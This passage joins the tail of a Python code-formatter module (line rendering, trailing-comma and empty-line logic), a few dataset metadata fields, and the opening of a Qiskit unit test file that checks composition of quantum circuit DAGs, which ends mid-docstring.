elif self.has_magic_trailing_comma(leaf, ensure_removable=True):
self.remove_trailing_comma()
if not self.append_comment(leaf):
self.leaves.append(leaf)
def append_safe(self, leaf: Leaf, preformatted: bool = False) -> None:
"""Like :func:`append()` but disallow invalid standalone comment structure.
Raises ValueError when any `leaf` is appended after a standalone comment
or when a standalone comment is not the first leaf on the line.
"""
if self.bracket_tracker.depth == 0:
if self.is_comment:
raise ValueError("cannot append to standalone comments")
if self.leaves and leaf.type == STANDALONE_COMMENT:
raise ValueError(
"cannot append standalone comments to a populated line"
)
self.append(leaf, preformatted=preformatted)
@property
def is_comment(self) -> bool:
"""Is this line a standalone comment?"""
return len(self.leaves) == 1 and self.leaves[0].type == STANDALONE_COMMENT
@property
def is_decorator(self) -> bool:
"""Is this line a decorator?"""
return bool(self) and self.leaves[0].type == token.AT
@property
def is_import(self) -> bool:
"""Is this an import line?"""
return bool(self) and is_import(self.leaves[0])
@property
def is_class(self) -> bool:
"""Is this line a class definition?"""
return (
bool(self)
and self.leaves[0].type == token.NAME
and self.leaves[0].value == "class"
)
@property
def is_stub_class(self) -> bool:
"""Is this line a class definition with a body consisting only of "..."?"""
return self.is_class and self.leaves[-3:] == [
Leaf(token.DOT, ".") for _ in range(3)
]
@property
def is_def(self) -> bool:
"""Is this a function definition? (Also returns True for async defs.)"""
try:
first_leaf = self.leaves[0]
except IndexError:
return False
try:
second_leaf: Optional[Leaf] = self.leaves[1]
except IndexError:
second_leaf = None
return (first_leaf.type == token.NAME and first_leaf.value == "def") or (
first_leaf.type == token.ASYNC
and second_leaf is not None
and second_leaf.type == token.NAME
and second_leaf.value == "def"
)
@property
def is_class_paren_empty(self) -> bool:
"""Is this a class with no base classes but using parentheses?
Those are unnecessary and should be removed.
"""
return (
bool(self)
and len(self.leaves) == 4
and self.is_class
and self.leaves[2].type == token.LPAR
and self.leaves[2].value == "("
and self.leaves[3].type == token.RPAR
and self.leaves[3].value == ")"
)
@property
def is_triple_quoted_string(self) -> bool:
"""Is the line a triple quoted string?"""
return (
bool(self)
and self.leaves[0].type == token.STRING
and self.leaves[0].value.startswith(('"""', "'''"))
)
def contains_standalone_comments(self, depth_limit: int = sys.maxsize) -> bool:
"""If so, needs to be split before emitting."""
for leaf in self.leaves:
if leaf.type == STANDALONE_COMMENT and leaf.bracket_depth <= depth_limit:
return True
return False
def contains_uncollapsable_type_comments(self) -> bool:
ignored_ids = set()
try:
last_leaf = self.leaves[-1]
ignored_ids.add(id(last_leaf))
if last_leaf.type == token.COMMA or (
last_leaf.type == token.RPAR and not last_leaf.value
):
# When trailing commas or optional parens are inserted by Black for
# consistency, comments after the previous last element are not moved
# (they don't have to, rendering will still be correct). So we ignore
# trailing commas and invisible.
last_leaf = self.leaves[-2]
ignored_ids.add(id(last_leaf))
except IndexError:
return False
# A type comment is uncollapsable if it is attached to a leaf
# that isn't at the end of the line (since that could cause it
# to get associated to a different argument) or if there are
# comments before it (since that could cause it to get hidden
# behind a comment.
comment_seen = False
for leaf_id, comments in self.comments.items():
for comment in comments:
if is_type_comment(comment):
if comment_seen or (
not is_type_comment(comment, " ignore")
and leaf_id not in ignored_ids
):
return True
comment_seen = True
return False
def contains_unsplittable_type_ignore(self) -> bool:
if not self.leaves:
return False
# If a 'type: ignore' is attached to the end of a line, we
# can't split the line, because we can't know which of the
# subexpressions the ignore was meant to apply to.
#
# We only want this to apply to actual physical lines from the
# original source, though: we don't want the presence of a
# 'type: ignore' at the end of a multiline expression to
# justify pushing it all onto one line. Thus we
# (unfortunately) need to check the actual source lines and
# only report an unsplittable 'type: ignore' if this line was
# one line in the original code.
# Grab the first and last line numbers, skipping generated leaves
first_line = next((leaf.lineno for leaf in self.leaves if leaf.lineno != 0), 0)
last_line = next(
(leaf.lineno for leaf in reversed(self.leaves) if leaf.lineno != 0), 0
)
if first_line == last_line:
# We look at the last two leaves since a comma or an
# invisible paren could have been added at the end of the
# line.
for node in self.leaves[-2:]:
for comment in self.comments.get(id(node), []):
if is_type_comment(comment, " ignore"):
return True
return False
def contains_multiline_strings(self) -> bool:
return any(is_multiline_string(leaf) for leaf in self.leaves)
def has_magic_trailing_comma(
self, closing: Leaf, ensure_removable: bool = False
) -> bool:
"""Return True if we have a magic trailing comma, that is when:
- there's a trailing comma here
- it's not a one-tuple
Additionally, if ensure_removable:
- it's not from square bracket indexing
"""
if not (
closing.type in CLOSING_BRACKETS
and self.leaves
and self.leaves[-1].type == token.COMMA
):
return False
if closing.type == token.RBRACE:
return True
if closing.type == token.RSQB:
if not ensure_removable:
return True
comma = self.leaves[-1]
return bool(comma.parent and comma.parent.type == syms.listmaker)
if self.is_import:
return True
if not is_one_tuple_between(closing.opening_bracket, closing, self.leaves):
return True
return False
def append_comment(self, comment: Leaf) -> bool:
"""Add an inline or standalone comment to the line."""
if (
comment.type == STANDALONE_COMMENT
and self.bracket_tracker.any_open_brackets()
):
comment.prefix = ""
return False
if comment.type != token.COMMENT:
return False
if not self.leaves:
comment.type = STANDALONE_COMMENT
comment.prefix = ""
return False
last_leaf = self.leaves[-1]
if (
last_leaf.type == token.RPAR
and not last_leaf.value
and last_leaf.parent
and len(list(last_leaf.parent.leaves())) <= 3
and not is_type_comment(comment)
):
# Comments on an optional parens wrapping a single leaf should belong to
# the wrapped node except if it's a type comment. Pinning the comment like
# this avoids unstable formatting caused by comment migration.
if len(self.leaves) < 2:
comment.type = STANDALONE_COMMENT
comment.prefix = ""
return False
last_leaf = self.leaves[-2]
self.comments.setdefault(id(last_leaf), []).append(comment)
return True
def comments_after(self, leaf: Leaf) -> List[Leaf]:
"""Generate comments that should appear directly after `leaf`."""
return self.comments.get(id(leaf), [])
def remove_trailing_comma(self) -> None:
"""Remove the trailing comma and moves the comments attached to it."""
trailing_comma = self.leaves.pop()
trailing_comma_comments = self.comments.pop(id(trailing_comma), [])
self.comments.setdefault(id(self.leaves[-1]), []).extend(
trailing_comma_comments
)
def is_complex_subscript(self, leaf: Leaf) -> bool:
"""Return True iff `leaf` is part of a slice with non-trivial exprs."""
open_lsqb = self.bracket_tracker.get_open_lsqb()
if open_lsqb is None:
return False
subscript_start = open_lsqb.next_sibling
if isinstance(subscript_start, Node):
if subscript_start.type == syms.listmaker:
return False
if subscript_start.type == syms.subscriptlist:
subscript_start = child_towards(subscript_start, leaf)
return subscript_start is not None and any(
n.type in TEST_DESCENDANTS for n in subscript_start.pre_order()
)
def enumerate_with_length(
self, reversed: bool = False
) -> Iterator[Tuple[Index, Leaf, int]]:
"""Return an enumeration of leaves with their length.
Stops prematurely on multiline strings and standalone comments.
"""
op = cast(
Callable[[Sequence[Leaf]], Iterator[Tuple[Index, Leaf]]],
enumerate_reversed if reversed else enumerate,
)
for index, leaf in op(self.leaves):
length = len(leaf.prefix) + len(leaf.value)
if "\n" in leaf.value:
return # Multiline strings, we can't continue.
for comment in self.comments_after(leaf):
length += len(comment.value)
yield index, leaf, length
def clone(self) -> "Line":
return Line(
mode=self.mode,
depth=self.depth,
inside_brackets=self.inside_brackets,
should_split_rhs=self.should_split_rhs,
magic_trailing_comma=self.magic_trailing_comma,
)
def render(self, force_spaces: bool = False) -> str:
"""Render the line."""
if not self:
return "\n"
indent_style = " " if force_spaces or not self.mode.use_tabs else "\t"
indent = indent_style * self.depth
leaves = iter(self.leaves)
first = next(leaves)
res = f"{first.prefix}{indent}{first.value}"
for leaf in leaves:
res += str(leaf)
for comment in itertools.chain.from_iterable(self.comments.values()):
res += str(comment)
return res + "\n"
def __str__(self) -> str:
"""Render the line."""
return self.render()
def __bool__(self) -> bool:
"""Return True if the line has leaves or comments."""
return bool(self.leaves or self.comments)
@dataclass
class EmptyLineTracker:
"""Provides a stateful method that returns the number of potential extra
empty lines needed before and after the currently processed line.
Note: this tracker works on lines that haven't been split yet. It assumes
the prefix of the first leaf consists of optional newlines. Those newlines
are consumed by `maybe_empty_lines()` and included in the computation.
"""
is_pyi: bool = False
previous_line: Optional[Line] = None
previous_after: int = 0
previous_defs: List[int] = field(default_factory=list)
def maybe_empty_lines(self, current_line: Line) -> Tuple[int, int]:
"""Return the number of extra empty lines before and after the `current_line`.
This is for separating `def`, `async def` and `class` with extra empty
lines (two on module-level).
"""
before, after = self._maybe_empty_lines(current_line)
before = (
# Black should not insert empty lines at the beginning
# of the file
0
if self.previous_line is None
else before - self.previous_after
)
self.previous_after = after
self.previous_line = current_line
return before, after
def _maybe_empty_lines(self, current_line: Line) -> Tuple[int, int]:
max_allowed = 1
if current_line.depth == 0:
max_allowed = 1 if self.is_pyi else 2
if current_line.leaves:
# Consume the first leaf's extra newlines.
first_leaf = current_line.leaves[0]
before = first_leaf.prefix.count("\n")
before = min(before, max_allowed)
first_leaf.prefix = ""
else:
before = 0
depth = current_line.depth
while self.previous_defs and self.previous_defs[-1] >= depth:
self.previous_defs.pop()
if self.is_pyi:
before = 0 if depth else 1
else:
before = 1 if depth else 2
if current_line.is_decorator or current_line.is_def or current_line.is_class:
return self._maybe_empty_lines_for_class_or_def(current_line, before)
if (
self.previous_line
and self.previous_line.is_import
and not current_line.is_import
and depth == self.previous_line.depth
):
return (before or 1), 0
if (
self.previous_line
and self.previous_line.is_class
and current_line.is_triple_quoted_string
):
return before, 1
return before, 0
def _maybe_empty_lines_for_class_or_def(
self, current_line: Line, before: int
) -> Tuple[int, int]:
if not current_line.is_decorator:
self.previous_defs.append(current_line.depth)
if self.previous_line is None:
# Don't insert empty lines before the first line in the file.
return 0, 0
if self.previous_line.is_decorator:
if self.is_pyi and current_line.is_stub_class:
# Insert an empty line after a decorated stub class
return 0, 1
return 0, 0
if self.previous_line.depth < current_line.depth and (
self.previous_line.is_class or self.previous_line.is_def
):
return 0, 0
if (
self.previous_line.is_comment
and self.previous_line.depth == current_line.depth
and before == 0
):
return 0, 0
if self.is_pyi:
if self.previous_line.depth > current_line.depth:
newlines = 1
elif current_line.is_class or self.previous_line.is_class:
if current_line.is_stub_class and self.previous_line.is_stub_class:
# No blank line between classes with an empty body
newlines = 0
else:
newlines = 1
elif (
current_line.is_def or current_line.is_decorator
) and not self.previous_line.is_def:
# Blank line between a block of functions (maybe with preceding
# decorators) and a block of non-functions
newlines = 1
else:
newlines = 0
else:
newlines = 2
if current_line.depth and newlines:
newlines -= 1
return newlines, 0
def enumerate_reversed(sequence: Sequence[T]) -> Iterator[Tuple[Index, T]]:
"""Like `reversed(enumerate(sequence))` if that were possible."""
index = len(sequence) - 1
for element in reversed(sequence):
yield (index, element)
index -= 1
def append_leaves(
new_line: Line, old_line: Line, leaves: List[Leaf], preformatted: bool = False
) -> None:
"""
Append leaves (taken from @old_line) to @new_line, making sure to fix the
underlying Node structure where appropriate.
All of the leaves in @leaves are duplicated. The duplicates are then
appended to @new_line and used to replace their originals in the underlying
Node structure. Any comments attached to the old leaves are reattached to
the new leaves.
Pre-conditions:
set(@leaves) is a subset of set(@old_line.leaves).
"""
for old_leaf in leaves:
new_leaf = Leaf(old_leaf.type, old_leaf.value)
replace_child(old_leaf, new_leaf)
new_line.append(new_leaf, preformatted=preformatted)
for comment_leaf in old_line.comments_after(old_leaf):
new_line.append(comment_leaf, preformatted=True)
def is_line_short_enough(line: Line, *, line_length: int, line_str: str = "") -> bool:
"""Return True if `line` is no longer than `line_length`.
Uses the provided `line_str` rendering, if any, otherwise computes a new one.
"""
if not line_str:
line_str = line_to_string(line)
return (
len(line_str) <= line_length
and "\n" not in line_str # multiline strings
and not line.contains_standalone_comments()
)
def can_be_split(line: Line) -> bool:
"""Return False if the line cannot be split *for sure*.
This is not an exhaustive search but a cheap heuristic that we can use to
avoid some unfortunate formattings (mostly around wrapping unsplittable code
in unnecessary parentheses).
"""
leaves = line.leaves
if len(leaves) < 2:
return False
if leaves[0].type == token.STRING and leaves[1].type == token.DOT:
call_count = 0
dot_count = 0
next = leaves[-1]
for leaf in leaves[-2::-1]:
if leaf.type in OPENING_BRACKETS:
if next.type not in CLOSING_BRACKETS:
return False
call_count += 1
elif leaf.type == token.DOT:
dot_count += 1
elif leaf.type == token.NAME:
if not (next.type == token.DOT or next.type in OPENING_BRACKETS):
return False
elif leaf.type not in CLOSING_BRACKETS:
return False
if dot_count > 1 and call_count > 1:
return False
return True
def can_omit_invisible_parens(
line: Line,
line_length: int,
omit_on_explode: Collection[LeafID] = (),
) -> bool:
"""Does `line` have a shape safe to reformat without optional parens around it?
Returns True for only a subset of potentially nice looking formattings but
the point is to not return false positives that end up producing lines that
are too long.
"""
bt = line.bracket_tracker
if not bt.delimiters:
# Without delimiters the optional parentheses are useless.
return True
max_priority = bt.max_delimiter_priority()
if bt.delimiter_count_with_priority(max_priority) > 1:
# With more than one delimiter of a kind the optional parentheses read better.
return False
if max_priority == DOT_PRIORITY:
# A single stranded method call doesn't require optional parentheses.
return True
assert len(line.leaves) >= 2, "Stranded delimiter"
# With a single delimiter, omit if the expression starts or ends with
# a bracket.
first = line.leaves[0]
second = line.leaves[1]
if first.type in OPENING_BRACKETS and second.type not in CLOSING_BRACKETS:
if _can_omit_opening_paren(line, first=first, line_length=line_length):
return True
# Note: we are not returning False here because a line might have *both*
# a leading opening bracket and a trailing closing bracket. If the
# opening bracket doesn't match our rule, maybe the closing will.
penultimate = line.leaves[-2]
last = line.leaves[-1]
if line.magic_trailing_comma:
try:
penultimate, last = last_two_except(line.leaves, omit=omit_on_explode)
except LookupError:
# Turns out we'd omit everything. We cannot skip the optional parentheses.
return False
if (
last.type == token.RPAR
or last.type == token.RBRACE
or (
# don't use indexing for omitting optional parentheses;
# it looks weird
last.type == token.RSQB
and last.parent
and last.parent.type != syms.trailer
)
):
if penultimate.type in OPENING_BRACKETS:
# Empty brackets don't help.
return False
if is_multiline_string(first):
# Additional wrapping of a multiline string in this situation is
# unnecessary.
return True
if line.magic_trailing_comma and penultimate.type == token.COMMA:
# The rightmost non-omitted bracket pair is the one we want to explode on.
return True
if _can_omit_closing_paren(line, last=last, line_length=line_length):
return True
return False
def _can_omit_opening_paren(line: Line, *, first: Leaf, line_length: int) -> bool:
"""See `can_omit_invisible_parens`."""
remainder = False
length = 4 * line.depth
_index = -1
for _index, leaf, leaf_length in line.enumerate_with_length():
if leaf.type in CLOSING_BRACKETS and leaf.opening_bracket is first:
remainder = True
if remainder:
length += leaf_length
if length > line_length:
break
if leaf.type in OPENING_BRACKETS:
# There are brackets we can further split on.
remainder = False
else:
# checked the entire string and line length wasn't exceeded
if len(line.leaves) == _index + 1:
return True
return False
def _can_omit_closing_paren(line: Line, *, last: Leaf, line_length: int) -> bool:
"""See `can_omit_invisible_parens`."""
length = 4 * line.depth
seen_other_brackets = False
for _index, leaf, leaf_length in line.enumerate_with_length():
length += leaf_length
if leaf is last.opening_bracket:
if seen_other_brackets or length <= line_length:
return True
elif leaf.type in OPENING_BRACKETS:
# There are brackets we can further split on.
seen_other_brackets = True
return False
def line_to_string(line: Line) -> str:
"""Returns the string representation of @line.
WARNING: This is known to be computationally expensive.
"""
return str(line).strip("\n")
| 35.247297
| 88
| 0.608136
|
f689fbbf7e0cf4e062a9e54832f0388f631aa7f5
| 16,700
|
py
|
Python
|
test/python/dagcircuit/test_compose.py
|
ajavadia/qiskit-sdk-py
|
a59e8e6be1793197e19998c1f7dcfc45e6f2f3af
|
[
"Apache-2.0"
] | 11
|
2019-06-27T09:53:29.000Z
|
2021-03-02T04:40:30.000Z
|
test/python/dagcircuit/test_compose.py
|
ajavadia/qiskit-sdk-py
|
a59e8e6be1793197e19998c1f7dcfc45e6f2f3af
|
[
"Apache-2.0"
] | 12
|
2018-09-21T12:02:18.000Z
|
2018-09-25T09:14:59.000Z
|
test/python/dagcircuit/test_compose.py
|
ajavadia/qiskit-sdk-py
|
a59e8e6be1793197e19998c1f7dcfc45e6f2f3af
|
[
"Apache-2.0"
] | 4
|
2019-08-05T15:35:33.000Z
|
2020-09-18T18:55:02.000Z
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test for the DAGCircuit object"""
import unittest
from qiskit.circuit import QuantumRegister, ClassicalRegister, QuantumCircuit
from qiskit.converters import circuit_to_dag, dag_to_circuit
from qiskit.dagcircuit.exceptions import DAGCircuitError
from qiskit.test import QiskitTestCase
class TestDagCompose(QiskitTestCase):
"""Test composition of two dags"""
def setUp(self):
super().setUp()
qreg1 = QuantumRegister(3, 'lqr_1')
qreg2 = QuantumRegister(2, 'lqr_2')
creg = ClassicalRegister(2, 'lcr')
self.circuit_left = QuantumCircuit(qreg1, qreg2, creg)
self.circuit_left.h(qreg1[0])
self.circuit_left.x(qreg1[1])
self.circuit_left.p(0.1, qreg1[2])
self.circuit_left.cx(qreg2[0], qreg2[1])
self.left_qubit0 = qreg1[0]
self.left_qubit1 = qreg1[1]
self.left_qubit2 = qreg1[2]
self.left_qubit3 = qreg2[0]
self.left_qubit4 = qreg2[1]
self.left_clbit0 = creg[0]
self.left_clbit1 = creg[1]
self.condition1 = (creg, 1)
self.condition2 = (creg, 2)
def test_compose_inorder(self):
"""Composing two dags of the same width, default order.
┌───┐
lqr_1_0: |0>──┤ H ├─── rqr_0: |0>──■───────
├───┤ │ ┌───┐
lqr_1_1: |0>──┤ X ├─── rqr_1: |0>──┼──┤ X ├
┌─┴───┴──┐ │ ├───┤
lqr_1_2: |0>┤ P(0.1) ├ + rqr_2: |0>──┼──┤ Y ├ =
└────────┘ ┌─┴─┐└───┘
lqr_2_0: |0>────■───── rqr_3: |0>┤ X ├─────
┌─┴─┐ └───┘┌───┐
lqr_2_1: |0>──┤ X ├─── rqr_4: |0>─────┤ Z ├
└───┘ └───┘
lcr_0: 0 ═══════════
lcr_1: 0 ═══════════
┌───┐
lqr_1_0: |0>──┤ H ├─────■───────
├───┤ │ ┌───┐
lqr_1_1: |0>──┤ X ├─────┼──┤ X ├
┌─┴───┴──┐ │ ├───┤
lqr_1_2: |0>┤ P(0.1) ├──┼──┤ Y ├
└────────┘┌─┴─┐└───┘
lqr_2_0: |0>────■─────┤ X ├─────
┌─┴─┐ └───┘┌───┐
lqr_2_1: |0>──┤ X ├────────┤ Z ├
└───┘ └───┘
lcr_0: 0 ═══════════════════════
lcr_1: 0 ═══════════════════════
"""
qreg = QuantumRegister(5, 'rqr')
circuit_right = QuantumCircuit(qreg)
circuit_right.cx(qreg[0], qreg[3])
circuit_right.x(qreg[1])
circuit_right.y(qreg[2])
circuit_right.z(qreg[4])
dag_left = circuit_to_dag(self.circuit_left)
dag_right = circuit_to_dag(circuit_right)
# default wiring: i <- i
dag_left.compose(dag_right)
circuit_composed = dag_to_circuit(dag_left)
circuit_expected = self.circuit_left.copy()
circuit_expected.cx(self.left_qubit0, self.left_qubit3)
circuit_expected.x(self.left_qubit1)
circuit_expected.y(self.left_qubit2)
circuit_expected.z(self.left_qubit4)
self.assertEqual(circuit_composed, circuit_expected)
def test_compose_inorder_smaller(self):
"""Composing with a smaller RHS dag, default order.
┌───┐ ┌─────┐
lqr_1_0: |0>──┤ H ├─── rqr_0: |0>──■──┤ Tdg ├
├───┤ ┌─┴─┐└─────┘
lqr_1_1: |0>──┤ X ├─── rqr_1: |0>┤ X ├───────
┌─┴───┴──┐ └───┘
lqr_1_2: |0>┤ P(0.1) ├ + =
└────────┘
lqr_2_0: |0>────■─────
┌─┴─┐
lqr_2_1: |0>──┤ X ├───
└───┘
lcr_0: 0 ══════════════
lcr_1: 0 ══════════════
┌───┐ ┌─────┐
lqr_1_0: |0>──┤ H ├─────■──┤ Tdg ├
├───┤ ┌─┴─┐└─────┘
lqr_1_1: |0>──┤ X ├───┤ X ├───────
┌─┴───┴──┐└───┘
lqr_1_2: |0>┤ P(0.1) ├────────────
└────────┘
lqr_2_0: |0>────■─────────────────
┌─┴─┐
lqr_2_1: |0>──┤ X ├───────────────
└───┘
lcr_0: 0 ═════════════════════════
lcr_1: 0 ═════════════════════════
"""
qreg = QuantumRegister(2, 'rqr')
circuit_right = QuantumCircuit(qreg)
circuit_right.cx(qreg[0], qreg[1])
circuit_right.tdg(qreg[0])
dag_left = circuit_to_dag(self.circuit_left)
dag_right = circuit_to_dag(circuit_right)
# default wiring: i <- i
dag_left.compose(dag_right)
circuit_composed = dag_to_circuit(dag_left)
circuit_expected = self.circuit_left.copy()
circuit_expected.cx(self.left_qubit0, self.left_qubit1)
circuit_expected.tdg(self.left_qubit0)
self.assertEqual(circuit_composed, circuit_expected)
def test_compose_permuted(self):
"""Composing two dags of the same width, permuted wires.
┌───┐
lqr_1_0: |0>──┤ H ├─── rqr_0: |0>──■───────
├───┤ │ ┌───┐
lqr_1_1: |0>──┤ X ├─── rqr_1: |0>──┼──┤ X ├
┌─┴───┴──┐ │ ├───┤
lqr_1_2: |0>┤ P(0.1) ├ rqr_2: |0>──┼──┤ Y ├
└────────┘ ┌─┴─┐└───┘
lqr_2_0: |0>────■───── + rqr_3: |0>┤ X ├───── =
┌─┴─┐ └───┘┌───┐
lqr_2_1: |0>──┤ X ├─── rqr_4: |0>─────┤ Z ├
└───┘ └───┘
lcr_0: 0 ═════════════
lcr_1: 0 ═════════════
┌───┐ ┌───┐
lqr_1_0: |0>──┤ H ├───┤ Z ├
├───┤ ├───┤
lqr_1_1: |0>──┤ X ├───┤ X ├
┌─┴───┴──┐├───┤
lqr_1_2: |0>┤ P(0.1) ├┤ Y ├
└────────┘└───┘
lqr_2_0: |0>────■───────■──
┌─┴─┐ ┌─┴─┐
lqr_2_1: |0>──┤ X ├───┤ X ├
└───┘ └───┘
lcr_0: 0 ══════════════════
lcr_1: 0 ══════════════════
"""
qreg = QuantumRegister(5, 'rqr')
circuit_right = QuantumCircuit(qreg)
circuit_right.cx(qreg[0], qreg[3])
circuit_right.x(qreg[1])
circuit_right.y(qreg[2])
circuit_right.z(qreg[4])
dag_left = circuit_to_dag(self.circuit_left)
dag_right = circuit_to_dag(circuit_right)
# permuted wiring
dag_left.compose(dag_right, qubits=[self.left_qubit3,
self.left_qubit1,
self.left_qubit2,
self.left_qubit4,
self.left_qubit0])
circuit_composed = dag_to_circuit(dag_left)
circuit_expected = self.circuit_left.copy()
circuit_expected.z(self.left_qubit0)
circuit_expected.x(self.left_qubit1)
circuit_expected.y(self.left_qubit2)
circuit_expected.cx(self.left_qubit3, self.left_qubit4)
self.assertEqual(circuit_composed, circuit_expected)
def test_compose_permuted_smaller(self):
"""Composing with a smaller RHS dag, and permuted wires.
┌───┐ ┌─────┐
lqr_1_0: |0>──┤ H ├─── rqr_0: |0>──■──┤ Tdg ├
├───┤ ┌─┴─┐└─────┘
lqr_1_1: |0>──┤ X ├─── rqr_1: |0>┤ X ├───────
┌─┴───┴──┐ └───┘
lqr_1_2: |0>┤ P(0.1) ├ + =
└────────┘
lqr_2_0: |0>────■─────
┌─┴─┐
lqr_2_1: |0>──┤ X ├───
└───┘
lcr_0: 0 ═════════════
lcr_1: 0 ═════════════
┌───┐
lqr_1_0: |0>──┤ H ├───────────────
├───┤
lqr_1_1: |0>──┤ X ├───────────────
┌─┴───┴──┐┌───┐
lqr_1_2: |0>┤ P(0.1) ├┤ X ├───────
└────────┘└─┬─┘┌─────┐
lqr_2_0: |0>────■───────■──┤ Tdg ├
┌─┴─┐ └─────┘
lqr_2_1: |0>──┤ X ├───────────────
└───┘
lcr_0: 0 ═════════════════════════
lcr_1: 0 ═════════════════════════
"""
qreg = QuantumRegister(2, 'rqr')
circuit_right = QuantumCircuit(qreg)
circuit_right.cx(qreg[0], qreg[1])
circuit_right.tdg(qreg[0])
dag_left = circuit_to_dag(self.circuit_left)
dag_right = circuit_to_dag(circuit_right)
# permuted wiring of subset
dag_left.compose(dag_right, qubits=[self.left_qubit3, self.left_qubit2])
circuit_composed = dag_to_circuit(dag_left)
circuit_expected = self.circuit_left.copy()
circuit_expected.cx(self.left_qubit3, self.left_qubit2)
circuit_expected.tdg(self.left_qubit3)
self.assertEqual(circuit_composed, circuit_expected)
def test_compose_conditional(self):
"""Composing on classical bits.
┌───┐ ┌───┐ ┌─┐
lqr_1_0: |0>──┤ H ├─── rqr_0: ────────┤ H ├─┤M├───
├───┤ ┌───┐ └─┬─┘ └╥┘┌─┐
lqr_1_1: |0>──┤ X ├─── rqr_1: ─┤ X ├────┼────╫─┤M├
┌─┴───┴──┐ └─┬─┘ │ ║ └╥┘
lqr_1_2: |0>┤ P(0.1) ├ + ┌──┴──┐┌──┴──┐ ║ ║
└────────┘ rcr_0: ╡ ╞╡ ╞═╩══╬═
lqr_2_0: |0>────■───── │ = 2 ││ = 1 │ ║
┌─┴─┐ rcr_1: ╡ ╞╡ ╞════╩═
lqr_2_1: |0>──┤ X ├─── └─────┘└─────┘
└───┘
lcr_0: 0 ═════════════
lcr_1: 0 ═════════════
┌───┐
lqr_1_0: ──┤ H ├───────────────────────
├───┤ ┌───┐ ┌─┐
lqr_1_1: ──┤ X ├───────────┤ H ├────┤M├
┌─┴───┴──┐ └─┬─┘ └╥┘
lqr_1_2: ┤ P(0.1) ├──────────┼───────╫─
└────────┘ │ ║
lqr_2_0: ────■───────────────┼───────╫─
┌─┴─┐ ┌───┐ │ ┌─┐ ║
lqr_2_1: ──┤ X ├────┤ X ├────┼───┤M├─╫─
└───┘ └─┬─┘ │ └╥┘ ║
┌──┴──┐┌──┴──┐ ║ ║
lcr_0: ════════════╡ ╞╡ ╞═╩══╬═
│ = 1 ││ = 2 │ ║
lcr_1: ════════════╡ ╞╡ ╞════╩═
└─────┘└─────┘
"""
qreg = QuantumRegister(2, 'rqr')
creg = ClassicalRegister(2, 'rcr')
circuit_right = QuantumCircuit(qreg, creg)
circuit_right.x(qreg[1]).c_if(creg, 2)
circuit_right.h(qreg[0]).c_if(creg, 1)
circuit_right.measure(qreg, creg)
# permuted subset of qubits and clbits
dag_left = circuit_to_dag(self.circuit_left)
dag_right = circuit_to_dag(circuit_right)
# permuted subset of qubits and clbits
dag_left.compose(dag_right, qubits=[self.left_qubit1, self.left_qubit4],
clbits=[self.left_clbit1, self.left_clbit0])
circuit_composed = dag_to_circuit(dag_left)
circuit_expected = self.circuit_left.copy()
circuit_expected.x(self.left_qubit4).c_if(*self.condition1)
circuit_expected.h(self.left_qubit1).c_if(*self.condition2)
circuit_expected.measure(self.left_qubit4, self.left_clbit0)
circuit_expected.measure(self.left_qubit1, self.left_clbit1)
self.assertEqual(circuit_composed, circuit_expected)
def test_compose_classical(self):
"""Composing on classical bits.
┌───┐ ┌─────┐┌─┐
lqr_1_0: |0>──┤ H ├─── rqr_0: |0>──■──┤ Tdg ├┤M├
├───┤ ┌─┴─┐└─┬─┬─┘└╥┘
lqr_1_1: |0>──┤ X ├─── rqr_1: |0>┤ X ├──┤M├───╫─
┌─┴───┴──┐ └───┘ └╥┘ ║
lqr_1_2: |0>┤ P(0.1) ├ + rcr_0: 0 ════════╬════╩═ =
└────────┘ ║
lqr_2_0: |0>────■───── rcr_1: 0 ════════╩══════
┌─┴─┐
lqr_2_1: |0>──┤ X ├───
└───┘
lcr_0: 0 ═════════════
lcr_1: 0 ═════════════
┌───┐
lqr_1_0: |0>──┤ H ├──────────────────
├───┤ ┌─────┐┌─┐
lqr_1_1: |0>──┤ X ├─────■──┤ Tdg ├┤M├
┌─┴───┴──┐ │ └─────┘└╥┘
lqr_1_2: |0>┤ P(0.1) ├──┼──────────╫─
└────────┘ │ ║
lqr_2_0: |0>────■───────┼──────────╫─
┌─┴─┐ ┌─┴─┐ ┌─┐ ║
lqr_2_1: |0>──┤ X ├───┤ X ├──┤M├───╫─
└───┘ └───┘ └╥┘ ║
lcr_0: 0 ══════════════════╩════╬═
║
lcr_1: 0 ═══════════════════════╩═
"""
qreg = QuantumRegister(2, 'rqr')
creg = ClassicalRegister(2, 'rcr')
circuit_right = QuantumCircuit(qreg, creg)
circuit_right.cx(qreg[0], qreg[1])
circuit_right.tdg(qreg[0])
circuit_right.measure(qreg, creg)
dag_left = circuit_to_dag(self.circuit_left)
dag_right = circuit_to_dag(circuit_right)
# permuted subset of qubits and clbits
dag_left.compose(dag_right, qubits=[self.left_qubit1, self.left_qubit4],
clbits=[self.left_clbit1, self.left_clbit0])
circuit_composed = dag_to_circuit(dag_left)
circuit_expected = self.circuit_left.copy()
circuit_expected.cx(self.left_qubit1, self.left_qubit4)
circuit_expected.tdg(self.left_qubit1)
circuit_expected.measure(self.left_qubit4, self.left_clbit0)
circuit_expected.measure(self.left_qubit1, self.left_clbit1)
self.assertEqual(circuit_composed, circuit_expected)
def test_compose_condition_multiple_classical(self):
"""Compose a circuit with more than one creg.
┌───┐ ┌───┐
q5_0: q5_0: ─┤ H ├─ q5_0: ─┤ H ├─
└─┬─┘ └─┬─┘
┌──┴──┐ ┌──┴──┐
c0: + c0: 1/╡ = 1 ╞ = c0: 1/╡ = 1 ╞
└─────┘ └─────┘
c1: c1: 1/═══════ c1: 1/═══════
"""
# ref: https://github.com/Qiskit/qiskit-terra/issues/4964
qreg = QuantumRegister(1)
creg1 = ClassicalRegister(1)
creg2 = ClassicalRegister(1)
circuit_left = QuantumCircuit(qreg, creg1, creg2)
circuit_right = QuantumCircuit(qreg, creg1, creg2)
circuit_right.h(0).c_if(creg1, 1)
dag_left = circuit_to_dag(circuit_left)
dag_right = circuit_to_dag(circuit_right)
dag_composed = dag_left.compose(dag_right,
qubits=[0],
clbits=[0, 1],
inplace=False)
dag_expected = circuit_to_dag(circuit_right.copy())
self.assertEqual(dag_composed, dag_expected)
def test_compose_raises_if_splitting_condition_creg(self):
"""Verify compose raises if a condition is mapped to more than one creg.
┌───┐
